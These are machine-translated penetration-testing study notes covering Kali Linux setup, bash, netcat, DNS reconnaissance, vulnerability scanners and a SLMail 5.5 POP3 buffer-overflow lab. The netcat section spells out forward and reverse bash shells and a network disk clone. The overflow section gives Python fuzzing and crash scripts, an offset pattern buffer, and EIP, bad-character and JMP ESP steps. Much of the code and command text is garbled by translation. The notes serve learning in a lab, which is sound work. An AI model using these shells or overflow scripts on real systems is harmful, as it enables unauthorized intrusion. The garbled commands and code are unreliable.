A: install Kali
sudo add commands to run as root
reboot reboot shutdown -h now shutdown
1. Change User
first step: sudo passwd root
Step two: Enter the old password (kali) to confirm
Step Three: Enter the new password, and then Finally, it wants to enter the confirmation reboot reboot,
log on with root + password
root admin (root account): account 1: kali kali (general account) account 2
2. For the source and update
/ sources.list enter vim 1.vim / etc / apt Add source editor
2. If you save a permission problem with wq! Save
input transducer 3. After Source: apt-get update && apt- get upgrade && apt-get clean and update software update source
3. localization
1. The input terminal apt-get install xfonts-intl- chinese ttf-wqy-microhei mounting Chinese fonts (fonts can be downloaded after the source exchange)
2. after replacing the encoding format dpkg-reconfigure locales (root user) into the graphical interface (box selecting, Tab is a handover with * is selected), select zh_CN.UTF-8 after determining the zh_CN.UTF-8 as the default.
3. Enter the terminal: reboot reboot the system, the login screen language list in the upper pay attention to whether zh_CN.utf8, opening the list to determine selected for the Chinese - China (part of the change, if appears, reboot, can solve many problems)
4 install input method
Update-GET 1.apt
2.apt-GET install fcitx
3.apt-GET-install fcitx googlepinyin
then restart, there will be a new input method, no longer need to be configured the same as the original, click on the upper right corner you can switch the input method You can also configure your own shortcuts.
The quick start terminal is set
at 2020.1, but not in there gnome-terminal command to start the Terminal:
take now is xfce4- command to start the terminal,
found in the settings ---- ---- >> >> keyboard Add, enter xfce4 -terminal
Document Reference: https: //blog.csdn.net/Jack0610/article/details/103931466 depth_1-utm_source = distribute.pc_relevant.none-task & utm_source = distribute.pc_relevant.none-task?
II: familiar with the environment
1. familiar with the bash command
ls: lists the current directory is equivalent to win the next dir
Kali use under bshell default:
blue for white represents an ordinary file directory for executable files red green compressed files
-l displayed in the long file The first column indicates the first letter d represents a device file directory c l is connected - b represents the file represented fast
-a Show hidden files
-h easy to read displayed
-sort = time = size Sort Sort by size
cd: into the directory in the same win cd
. into the current directory
... the current directory to parent directory
pwd: View the current working directory ~ indicates the user's home directory (root directory)
CAT / path: displays the entire contents of the text type
more / path: according to the current window display file contents, only one, by-screen view
less / path: similar More
tail / path: the default display last 10 lines of the file - the number of lines
watch -n number command: no number of seconds behind execute a command
rm file name: delete the file
-r: delete the directory
cp file The new name [filename]: copy the file
-r: copy the directory /
pid: view the process
kill the process: kill the process
q: quit pid
PS: view the process
- EF
the AUX
grep: filter output content enhanced version eqrep
ifconfig card up / down: on / off card
netstat -pantu: View and address locally generated tcp udp connection
example: netstat -pantu | egrep -v '0.0.0.0 | :::' | awk '{}. 5 Print $' | egrep -v 'and | the Address'
| cut -d ':'. 1 -f | sort | the uniq> IP
Note: | awk truncated column pipe cut taken: after the first sort number sort uniq output
route
Mount: Mount the file directory to mount
-o loop file names .iso / directory to mount the iso file to a specified directory
dmesg: similar functions and tail, the default directory
find: Find files directory
-name find the file name / presentation root directory
-iname find similar file name directory
* wildcard
whereis: to find the same function, less result, fast and look for package management area
-b filename: Find binaries
echo: write command to display
the basic operation 2.vim text editor
enter vim: vim file name into the text editor or vi
editor: press i built
quit: 1 press esc built
2 + press the Shift:
3. save and exit: wq exit without saving q! Forced to save and exit WQ!
I enter edit mode
esc return to command mode
dd command-line mode to remove
the o-line command mode is inserted into
the y-line command mode to copy
the p-line command mode paste
a Add
3. conduit
pipe character:
|: vertical front command character as input after the command
& : around two followed by the implementation
&&: if the front behind the implementation of mistake is not performed, successful execution of the command behind
||: If the execution error is performed behind the front, back command is not executed successfully
4.Shell script
! # bin / bash line indicates the beginning of the file document explains the way
three: kali work environment optimization
1. network configuration
temporary ip address (restart failure)
dhclient eth0: automatically obtain ip address
ifconfig eth0 ip: Specifies the ip address
route add default gw gateway ip: Specifies the gateway
echo nameserver ip address> / etc /resolv.conf: change the dns address
fixed ip address
cat / etc / network / interface card profile
address: IP address
netmask: subnet mask,
gateway: gateway
network: the network address
broadcast: broadcast address
dns-nameservers: dns address
2. Environment Configuration
Four: basic tools
1.netcat
Base64 command: base64 encoded content crtl + d to
achieve telnet function
-v: show details content
-n ip address port: domain name is resolved
to transmit text information
wherein a need to open a port , the other as a client to connect to
host A:: nc -l -p port of the host port B nc -nv ip
-l open listening port and the port number specified -p
| grep 333 netstat -pantu
after performing: -q numbert after the exit number seconds
Output <input
transfer directory
sending end: tar -cvf - Directory | nc -lp port -q 1
receiving end: nc -nv IP Address Port | tar -xvf -
transfer encrypted files
A: nc -lp 333 | mcrypt --flush - -a -m Rijndael 256-Fbqd ECB> 1.mp4
B: the mcrypt --flush -Fbq Rijndael -a -m ECB-256 <a.mp4 | Q NC-333 1.1.1.1. 1 -nv
streaming services
A: cat 1.mp4 | nc the -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000-
port scan
-z: scan port
-u: probe udp port
nc -nvz ip address 1-65535
nc -nvzu ip address 1-1024
clone remotely hard
A: NC -lp 333 | dd of = / dev / SDA
B: dd if = / dev / SDA | -q. 1 333 NC -nv 1.1.1.1
dd: hard copy command block level
if : inputfile
remote control
forward:
A: NC 333 -lp the bash -C (host)
B: NC 333 -nv 1.1.1.1
reverse:
A: nc -lp 333
B: 333 nc -nv 1.1.1.1 bash -C (host)
Windows users to install nc will bash cmd
-C bash transmitted to another end of the shell
dns: 53 port
nc-ncat encryption away control
nc lack of authentication and encryption capabilities
ncat nmap included in the kit
A: -C ncat the bash -ALLOW 192.168.43.182 -vnl 333 --ssl
B: ncat -nv 192.168.43.100 --ssl
different systems / platforms function parameters nc different 2.wireshark
Ethereal sniffer protocol analyzer
Ethereal engine: libpcap-linux winpcap-windows
3.tcpdump
five: passive information collection
information collection:
the FQDN of the: fully qualified domain name
recursive queries iterative queries
domain records: a host cname alias record ptr record reverse DNS mail exchange record mx
nslookup
dns information collection
DIG
+ + noall answer
-x Anti to query
information bind version: txt chaos vERSION.BIND @ ns.sina.com
track: + trace
zone transfer: DIG @ example.com ns1.example.com
Host -T the -l sina.com ns3.sina.com
View command manual :
man
info
-help -H
DNS field blasting
Fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txt
dnsdict6 the -X-16-d4 -t sina.com
dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 -o sina.xml sina.com
dnsmap sina.com -w dns.txt
dnsreson -t 10 -d sina.com --lifetime BRT -D dnsbig.txt
-t -d sina.com std dnsreson
dns registration information
WHOIS
WHOIS -h whois.apnic.net 192.0.43.10
search engine
Shodan
NET
City
Country
Port
os
hostname host or domain name
Server
Google
Recon-ng
Six: Active Information Collection
1. found
two layer discovery
the arping
1.1.1.1 -C. 1 the arping
the arping 1.1.1.1 -d check ip with different inspection mac arp deception
nmap
namp 192.168.1.1/24 -sn
netdiscover
主动:
netdiscover -i eth0 -r 1.1.1.0/24
netdiscover -i iplist.txt
被动:
netdiscover -p
Scapy
APT-GET-install python3 gnuplot
function name must be capitalized ()
SR1 () contract
Three found
icmp protocol
traceroute
the ping -r
hping3
four found
host discovery
Scapy
nmap ip address -pu port -sn
ACK find nmap ip address -pa port -sn
hping3
seven: exploit
nmap
root @ Kali: / usr / report this content share / nmap / scripts # script.db CAT | WC the -l
smb-vuln-ms10-061.nse
shared printer vulnerability
nmap-p445-script = smb- enum-shares.nse-script-args = smbuser = admin, smbpassword = pass1.1.1 .1
vulnerability scanner
openvas
Nessus project branch
installation openvas
APT-GET install openvas
configure the installation openvas
openvas-Setup
check
openvas-check-setup
View current account
openvasmd-list-users
to modify account password
openvasmd-users = admin-new- password = password
upgrade openvas
openvas-Feed-Update
start openvas service
openvas-Start
Nessus
to download
installation:
dpkg-i
installation path: / opt / nessus
start the service:
/etc/init.d/nessusd start
Eight: buffer overflow
Windows
netstat command is neither internal nor external command
may not be current path access path to this command is located, that is not configured environment variables, if the configuration environment variable can be accessed at any path.
Configure the system variables, Path variable, adding "% SystemRoot% \ system32;
re-open the cmd command window (be sure to re-open, otherwise it will have no effect)
netstat -ano
Fuzzer
XP client software
slmail5.5 mona.py Immunity Debugger
XP end
firewall set the port exception: smtp25, POP3 110
ICMP echo request opens
kali end test
NC 110 192.168.43.147, 192.168.43.147 NC 25
POP3 command buffer overflow exists pass
win7 above security mechanisms:
DEP: stop code is executed from a data page
aslr : random memory address and the execution program loaded dll, each restart address change
eip register holds the address of the next instruction
Fuzzing py script
ideas: eip modify shellcode of the memory address, the write address space to shellcode, the program reads register eip value, jumps to and executes the code segment shellcode
kali may be used in the python vim script editor or mousepad, after saving property modification permissions for executables
2.py
#!/usr/bin/python
import socket
buffer=[“A”]
counter=100
while len(buffer)<=50:
buffer.append(“B”*counter)
counter=counter+200
for string in buffer:
print “fuzzing pass with %s bytes” %len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘192.168.43.147’,110))
s.recv(1024)
s.send(‘user test’+’\r\n’)
s.recv(1024)
s.send(‘pass ‘+string+’\r\n’)
s.send(‘quit\r\n’)
s.close()
图片: https://uploader.shimo.im/f/vceG0VHfpUYnjcPJ.png
图片: https://uploader.shimo.im/f/AIKerQJcHd8s7i22.png
3.py
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer=‘A’*2700
try:
print “\nSending evil buffer…”
s.connect((‘192.168.43.147’,110))
date=s.recv(1024)
s.send(‘user test’+’\r\n’)
data=s.recv(1024)
s.send(‘pass ‘+buffer+’\r\n’)
print “\nDone!.”
except:
print “could not connect to pop3”
Found 4-byte overflow accurate
dichotomy
4.py
rb script
unique string method:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#! / usr is / in bin / of python
import socket
s of = socket.socket, (socket.AF_INET, socket.SOCK_STREAM),
buffer=‘Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9 '
the try:
Print "\ nSending Evil Buffer ..."
s.connect (( '192.168.43.147', 110))
DATE = s.recv (1024)
s.send ( 'User Test' + '\ R & lt \ n-')
Data = s.recv (1024)
s.send ( 'Pass' + Buffer + '\ r \ the n-')
Print "\ nDone !."
the except:
Print "could not Connect to pop3"
picture: https://uploader.shimo.im /f/dcoqQfQP0sImNj4f.png
39,694,438 descending
hexadecimal 38 44 69 39 = ascii 8di9
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
Calculates the corresponding offset
image: https://uploader.shimo.im/f/i5iBJYnztiUcs8sf.png
5.py
placed esc shellcode in the
python script: Buffer = 'A' * 2606 + 'B' . 4 + 'C' (3500-2606-4)
to calculate the size of the register 416 sufficiently esp the shellcode
7.py judged bad characters
of different types of programs, protocols, bugs, some characters will be considered to be bad characters, which use a fixed
return address, the shellcode , buffer not appear bad characters are
null byte (0x00) the null character to terminate the string copy operation
return (0x0D) carriage return, the command entry represents pop3pass
ideas: transmitting 0x00-0xff256 characters, find all bad characters
badchars = 0-256 (corresponding to Hex)
0A 0D Tab key wrap 00 null value
Redirect the data stream
is replaced with an address value of eip esp
but esp randomly generated address change, hard decoding feasible
slmail threaded applications, the operating system for the range of addresses assigned to each thread, each thread address range uncertain
Thinking work
to find a fixed address in memory module system
looking jmp esp instruction address jumps in the module, then the indirect jump to the instruction from the esp, thereby performing the shellcode
mona.py script identification memory modules, search for "return address" It is jmp esp
mona.py need to use python2.7 or later
